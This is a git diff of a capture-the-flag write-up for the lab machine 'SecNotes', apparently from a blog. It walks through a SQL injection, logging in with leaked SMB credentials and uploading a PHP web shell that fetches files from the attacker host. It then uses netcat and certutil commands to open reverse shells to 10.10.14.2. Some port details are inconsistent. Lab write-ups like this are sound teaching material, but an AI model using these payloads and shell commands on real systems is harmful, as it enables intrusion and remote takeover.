--- a/_posts/2018-12-25-SecNotes.md
+++ b/_posts/2018-12-25-SecNotes.md
@@ -57,7 +57,7 @@ Continuing on with the page found at `http://10.10.10.97`, a new user account wa
 
 Upon logging into the newly created account, the page shown below is reached. The basic page functionality is demonstrated.
 
-![web_function.gif](/assets/images/htb/secnotes/web_fucntion.gif)
+![web_function.gif](/assets/images/htb/secnotes/web_function.gif)
 
 Moving back to the login page, basic SQL injection can be tested. If user data is not sanitized with a SQL querty, then sometimes login restrictions can be bypassed. A basic SQL injection string is shown below.
 
@@ -65,43 +65,80 @@ Moving back to the login page, basic SQL injection can be tested. If user data i
 username' OR 1=1#
 ```
 
+While logging in with this username is unsuccesful. A similar method from another HackTheBox machine, Nightmare, can be attempted. This method involves creating a user with the SQL injection string before attempting to login.
 
+After creating a user with the username `username' OR 1=1#`, logging in with this account allows for every note to be read. This suggests that the vulnerable SQL query is used during the login process only when an account already exists in the database.
 
-Similar to another HackTheBox machine, Nightmare, the login page for SecNotes suffers from a form of SQL injection where a user 
+The "Mimi's Sticky Buns" note contains a recipe for some delicious sounding sticky buns. The "Years" note contains the contents shown below:
+
+```
+"1957, 1982, 1993, 2005, 2009*, and 2017
+```
+
+The "new site" note contains what appears to be a username and password for the SMB service on port 80.
+
+```
+\\secnotes.htb\new-site
+tyler / 92g!mA8BGjOirkL%OG*&
+```
+
+As expected, these credentials provide access to the SMB service. The SMB shares can now be listed and accessed.
+
+![newsite_smb.png](/assets/images/htb/secnotes/newsite_smb.png)
+
+The `iisstart.htm` and `iisstart.png` files along with the share name `new-site` line up neatly with the IIS service running on TCP port 8808.
+
+Additionally, remote files can be written to the SMB share with the SMB `put` command once connected.
+
+It has been noted that the webserver running on port 80 is Microsoft IIS and that it executes PHP code. As the service on port 8808 is also Microsoft IIS and is running on the same system, it is likely that it also will execute PHP code. To test this, a `hmm.php` can be created and transferred to the target system. The contents of `hmm.php` are shown below.
+
+```php
+<?php system("dir");?>
+```
+
+If all goes as planned, the remote server will execute this code which will result in the Windows `dir` command being run on the system. Browsing to `http://10.10.10.97:88080/hmm.php` confirms that the server is executing PHP code.
+
+![hmm_php.png](/assets/images/htb/secnotes/hmm_php.png)
+
+To leverage this position into a reverse shell, the following steps can be taken.
+
+1. Host `nc.exe` on the attacking machine.
+2. Set up a `nc` listener on the attacking machine.
+3. Transfer `nc.exe` onto the remote system.
+4. Execute `nc.exe -e cmd.exe 10.10.14.2 4444` on the remote system.
+
+To achieve the first step, the Python SimpleHTTPServer module can be used, as shown below.
+
+```
+root@kali:~/workspace/hackthebox/SecNotes# cd ~/Tools/; python -m SimpleHTTPServer 80; cd -
+```
+
+This assumes that `nc.exe` is present in the `~/Tools` directory. The command will first `cd` into the `Tools` directory before hosting the contents of the directory on port 80. Once the command is interrupted, the directory will be changed back to the original directory.
+
+The second step can be achieved with `nc`. A simple listener can be set up with `nc -lp 4444`. This will listen for connections on the local attakcing machine on TCP port 4444.
+
+For steps three and four, the helpful `catch.php` file will be used, the contents of which is shown below.
+
+```php
+<?php
+
+if (isset($_REQUEST['fupload'])) {
+    file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.2/" . $_REQUEST['fupload']));
+};
+
+if (isset($_REQUEST['fexec'])) {
+    echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
+};
+
+?>
+```
+
+Once `catch.php` has been transferred to the `new-site` SMB share and steps one and two outlined above are complete, `catch.php` can be utilized by browsing first to `/catch.php?fupload=nc.exe` followed by browsing to `/catch.php?fexec=nc.exe -e cmd.exe 10.10.14.2 4444`. This process is demonstrated below.
+
+![catch_php.gif](/assets/images/htb/secnotes/catch_php.gif)
+
+The user flag can now be read.
+
+![user_txt.png](/assets/images/htb/secnotes/user_txt.png)
 
 ## Root
-While running through the usual privelege escalation enumeration commands, something stood out as odd. After running the `net users administrator` command, it was revealed that the "Password Not Required" property has been set for the Administrator user. This means that the Administrator user is allowed passwordless logon to the system.
-
-![net_user](/assets/images/htb/access/net_user.png)
-
-Investigating this property further with the Windows `cmdkey /list` command, it can be seen that the Administrator user has a stored credential on the system.
-
-![cmdkey](/assets/images/htb/access/cmdkey.png)
-
-Continuing enumeration, the `ZKAccess3.5 Security System.lnk` shortcut file found on the Public user's desktop suggests that commands can be run as the Administrator using the `runas` Windows command along with the `/savecred` flag. The `runas` command can be used to run a Windows command as another system user. 
-
-![savecred_link](/assets/images/htb/access/savecred_link.png)
-
-Putting these pieces together, it is clear that system commands can be run as the Administrator user if the `/savecred` flag is included as part of the `runas` command. The fact that the Administrator does not need a password to logon to the system, that the Administrator user has a stored credential on the system, and that the `runas` command with the `/savecred` flag is being used on the system suggests a possible privelege elevation scenario.
-
-To leverage this situtation, `nc.exe` can be transferred to the target system and then used to obtain a reverse shell that connects to the attacking machine.
-
-In this case, the `certutil` Windows tool is used on the target system to download `nc.exe`to the target system. After using Python's `SimpleHTTPServer` to host `nc.exe` on the attacking system, the `certutil` command shown below was run on the target system to download the `nc` executable to the system.
-
-```
-C:\Users\security\Music>certutil.exe -urlcache -split -f http://10.10.14.2/nc.exe nc.exe
-```
-
-A screenshot of this process is included below.
-
-![cert_util](/assets/images/htb/access/cert_util.png)
-
-With `nc.exe` on the target system and a `nc` listener listening on the attacking system, the command shown below was run on the target system to create a reverse shell connection to the attacking system.
-
-```
-C:\Users\security\Music>runas /user:Administrator /savecred "nc.exe -e cmd.exe 10.10.14.2 4444"
-```
-
-From the connection received on the attacking system, the `root.txt` flag can be read.
-
-![root_txt](/assets/images/htb/access/root_txt.png)
